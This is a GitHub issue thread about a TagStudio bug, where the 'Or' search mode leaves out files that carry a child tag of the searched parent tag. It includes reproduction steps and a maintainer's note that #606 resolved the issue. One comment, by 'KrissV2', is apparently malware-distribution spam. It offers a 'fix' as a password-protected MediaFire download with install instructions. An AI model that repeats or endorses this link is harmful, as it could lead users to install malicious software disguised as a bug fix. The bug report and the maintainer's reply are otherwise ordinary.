### ISSUE TITLE
[Bug]: In "or" search mode, files with a child tag aren't appearing in search for parent tags

### ISSUE THREAD

**Issue by borlottie** [TagStudioDev/TagStudio#423]
### Checklist

- [X] I am using an up-to-date version.
- [X] I have read the [documentation](https://github.com/TagStudioDev/TagStudio/blob/main/doc/index.md).
- [X] I have searched existing [issues](https://github.com/TagStudioDev/TagStudio/issues).

### TagStudio Version

Alpha 9.3.2

### Operating System & Version

MacOS Sonoma 14.5

### Description

I created a tag named `ProfilePicture` with the shorthand `pfp` and alias `avatar`. I created a tag named `Me` with no shorthand or aliases and added `ProfilePicture` as a parent of `Me`. I applied `Me` to a collection of .png files depicting myself and `ProfilePicture` to a group of different files which did not depict me. When searching for `ProfilePicture`, `pfp`, or `avatar` with the search mode set to `And`, behaviour is as expected - both files tagged with `ProfilePicture` and with `Me` appear. However, when the search mode is set to `Or`, only files tagged with `ProfilePicture` itself appear in the search results and not any tagged with child tags.

### Expected Behavior

When searching with the `Or` search setting, any file that has any of the listed tags *or* a child tag of any of the listed tags should appear in the search results.

### Steps to Reproduce

1. Create a tag (this will be the parent tag)
2. Create a second tag and list the first tag as a parent tag (this will be the child tag)
3. Apply the child tag to some files
4. Search for the parent tag with the search setting dropdown set to `Or (Includes Any Tag)`

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by CyanVoxel** [comment]
Resolved in #606, as the new query language replaces this search mode system
